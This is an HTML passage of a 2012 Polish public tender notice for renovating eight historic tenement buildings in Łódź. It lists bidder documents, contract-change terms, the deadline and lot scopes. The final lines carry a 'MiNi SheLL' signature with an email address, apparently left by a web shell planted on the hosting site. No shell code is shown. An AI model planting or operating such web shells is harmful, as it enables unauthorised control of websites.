<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zamawiający wymaga przedstawienia wypełnionego formularza podwykonawcy z wykorzystaniem wzoru - załącznik nr 6 do SIWZ;
Wykonawca zaakceptuje wzór umowy stanowiący załącznik do SIWZ nr 7 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy  przewiduje możliwość zmian istotnych postanowień zawartej umowy, które muszą zostać udokumentowane, w następującym zakresie:
a) zmiana terminu realizacji przedmiotu zamówienia będzie możliwa tylko w przypadku:
- zdarzeń losowych niezależnych od Wykonawcy lub Zamawiającego takich jak np.:  pożar, odcięcie zasilania, brak wody, trzęsienie ziemi, powódź i innych gwałtownych zdarzeń wywołanych czynnikami atmosferycznymi;
- wystąpienia warunków atmosferycznych, uniemożliwiających zachowanie technologii wykonania robót 
b) wystąpienia konieczności wykonania robót dodatkowych, od których zależy prawidłowe wykonanie przedmiotu zamówienia i właściwa realizacja umowy. Podstawą wykonania robót dodatkowych, będzie udzielenie zamówienia dodatkowego w trybie zamówienia z wolnej ręki, zgodnie z procedurą uregulowaną w art. 67 ust 1 pkt 5 ustawy. W przypadku konieczności udzielenia zamówienia dodatkowego może ulec zmianie termin wykonania zamówienia podstawowego, o czas niezbędny do wykonania zamówienia dodatkowego. Protokół konieczności podpisany przez upoważnionego przedstawiciela wykonawcy oraz upoważnionego przedstawiciela Zamawiającego, stanowić będzie podstawę do sporządzenia umowy na roboty dodatkowe w trybie zamówienia z wolnej ręki.
c) Wystąpienia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót, mających wpływ na zmianę terminu realizacji - zmianie ulegnie odpowiednio termin realizacji zamówienia;
d) wystąpienia robót dodatkowych i zamiennych;
e)  ustawowej zmiany stawki podatku VAT
 f) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności
spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami 
 organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji umowy oraz terminy wynikające z harmonogramu;
/g) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia   proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla  zamawiającego;
  h) braku warunków przyłączenia budynków do sieci miejskich, spowodowane opóźnieniem w wykonaniu sieci przyłączy realizowanych przez gestorów;


i) Termin wykonania robót może ulec wydłużeniu o okres trwania przeszkody uniemożliwiającej realizację robót, o której mowa powyżej. O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie powiadomić pisemnie Zamawiającego, wskazując jednocześnie wraz z uzasadnieniem nowy termin wykonania robót. Zamawiający zatwierdzi lub odrzuci proponowany przez Wykonawcę okres przedłużenia terminu wykonania robót w terminie do 14 dni roboczych od daty otrzymania powiadomienia Wykonawcy. Okres przedłużenia terminu wykonania robót zostanie potwierdzony przez strony w aneksie do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> radwanska.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź-Polesie RADWAŃSKA Łódź 90-540, ul. Radwańska 31,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2012 godzina 13:00, miejsce: W siedzibie zamawiającego, pokój nr 18. Otwarcie ofert jest jawne.
Administracja Nieruchomościami Łódź-Polesie RADWAŃSKA Łódź 90-540, ul. Radwańska 31,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Kopernika 33 w Łodzi w zakresie :.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty budowlane będą prowadzone w budynku zamieszkałym.
Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Kopernika 33 w Łodzi w zakresie : 
Wymiana stropu nad lokalem nr 18
Wymiana stropu nad piwnicą	
Wzmocnienie stropu lokalu nr 31 oraz odciążenie stropu poddasza 
Wzmocnienie ścian zewnętrznych nadproży i ściągi klatki schodowej
Przemurowanie przewodów kominowych
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalno-usługowym przy ul. Kopernika 33.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.70.00.00-5, 71.52.00.00-9, 71.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 157 w Łodz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont  elewacji 
Wymiana stolarki budowlanej na drewnianą 
Remont  dachu  
Izolacja piwnic 
Budynek gospodarczy 
Remont powierzchni podwórka polegający na demontażu starej nawierzchni i ułożeniu kostki brukowej betonowej 
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wymiana stolarki budowlanej na drewnianą 
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalnym Wólczańska 157

Budynek znajduje się w ewidencji zabytków

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .
Roboty budowlane będą prowadzone w budynku zamieszkałym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.70.00.00-5, 71.50.00.00-3, 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 151 w Łodzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 151 w Łodzi w zakresie : 
Remont  dachu - lewa oficyna
Remont  elewacji front + lewa oficyna + izolacje remontowanych balkonów
Remont elewacji podłużnej + docieplenie dwóch szczytów lewej oficyny + remont balkonów
Remont prześwitu bramowego 
Remont klatek schodowych front + lewa oficyna
Wymiana stropu nad piwnicami + wymiana polepy stropu poddasza
Rozbiórka przybudówki - lewa oficyna
Przemurowanie przewodów kominowych
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Ogrodzenie nawierzchnia z  kostki brukowej, mała architektura tereny zielone 
Wymiana stolarki budowlanej 
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalnym przy ul. Wólczańska 151

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .

Budynek znajduje się w ewidencji zabytków
Roboty budowlane będą prowadzone w budynku zamieszkałym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.70.00.00-5, 71.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Kopernika 52 w Łodzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Kopernika 52 w Łodzi w zakresie : 

 Remont  dekarskie front + oficyna
Wymiana i renowacja stolarki okiennej i drzwiowej 
Remont elewacji budynku oficyny
Naprawa tarasu
Remont budynku gospodarczego
Remont budynku gospodarczego - pergola
Malowanie elewacji ogrodzenie i brama budynek frontowy
Malowanie klatki schodowej i piwnicy
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wymiana i renowacja stolarki okiennej i drzwiowej 
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalno-usługowym przy ul. Kopernika 52

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .

Budynek znajduje się w ewidencji zabytków
Roboty budowlane będą prowadzone w budynku zamieszkałym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3, 71.70.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 147A w Łodzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 147A w Łodzi 
Elewacja ściany od strony podwórza  
Elewacja frontowa
Izolacja od strony ulicy
Przemurowanie gzymsów od podwórza
Zszycie ściany od strony podwórza
Zszycie ściany frontowej
Remont balkonów
Tynkowanie kominów
Remont klatki schodowej i korytarzy
Wymiana stolarki okiennej na ścianie od podwórza
Wymiana stolarki okiennej na ścianie frontowej
Remont prześwitu
Budynek gospodarczy - murowany
Remont budynku gospodarczego 
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Zagospodarowanie terenu
Budowa pergoli 
Remont podwórza 
Wymiana stolarki okiennej na ścianie od podwórza
Wymiana stolarki okiennej na ścianie frontowej
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalnym Wólczańska 147A
Remont podłogi w lokalu nr 1 i 3
Remont poddasza

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .

Budynek znajduje się w ewidencji zabytków
Roboty budowlane będą prowadzone w budynku zamieszkałym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.70.00.00-5, 71.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Radwańskiej 31 w Łodzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Radwańskiej 31 w Łodzi w zakresie : 
Remont elewacji budynku
Wykonanie izolacji ścian fundamentowych
Wymiana sztukaterii  budynku frontowego
Remont klatki schodowej
Wymiana stolarki na drewnianą
Remont komórek
Wykonanie pergoli remont ogrodzenia
Wykonanie nawierzchni z kostki brukowej
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalno-usługowym przy ul. Radwańskiej 31

Wskaźniki obiektów 
Budynek frontowy pow. zabudowy 332 m2

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .

Budynek znajduje się w ewidencji zabytków
Roboty budowlane będą prowadzone w budynku zamieszkałym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3, 71.70.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 145 w Łodzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 145 w Łodzi w zakresie : 
Elewacja frontowa
Ogrodzenie
Budynek gospodarczy - ściany
Elewacja południowa - lewa oficyna
Ściana szczytowa docieplenia
Ściana lewej oficyny od podwórza
Ściana zachodnia budynku frontowego
Budynek mieszkalny parterowy - roboty dekarskie
Docieplenie budynku mieszkalnego parterowego
Malowanie ściany piekarni
Malowanie klatki schodowej lewej oficyny
Malowanie klatki schodowej front
Docieplenie ściany szczytowej lewej oficyny
Remont nawierzchni posesji
Docieplenie stropu budynku frontowego
Docieplenie stropu lewej oficyny
Roboty dekarskie - komórkowiec
Roboty dekarskie - lewa oficyna
Roboty dekarskie - budynek frontowy
Roboty remontowe komórkowiec
Remont prześwitu bramowego
Wymiana stolarki na drewnianą
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalno-usługowym przy ul. Wólczańskiej 145

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .

Budynek znajduje się w ewidencji zabytków
Roboty budowlane będą prowadzone w budynku zamieszkałym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3, 71.70.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 169 w Łodzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 169 w Łodzi w zakresie : 
Remont elewacji budynków
Wykonanie izolacji ścian fundamentowych
Wzmocnienie nadproży okiennych
Wzmocnienie ścian zewnętrznych w miejscach pęknięć
Wymiana sztukaterii budynku frontowego
Remont klatki schodowej
Wymiana stolarki na drewnianą
Remont prześwitu bramowego polegający na uzupełnieniu tynków ścian i sufitów oraz malowaniu emulsyjnymi olejnym. Wykonanie wrót bramowych wg rysunku załączonego do projektu
Wykonanie nawierzchni z kostki brukowej
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalno-usługowym przy ul. Wólczańskiej 169

Wskaźniki obiektów 
Budynek frontowy pow. zabudowy 342,70 m2
Budynek prawej oficyny pow.  Zabudowy 140,00 m2
Roboty budowlane będą prowadzone w budynku zamieszkałym.
Budynek znajduje się w ewidencji zabytków

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3, 71.70.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com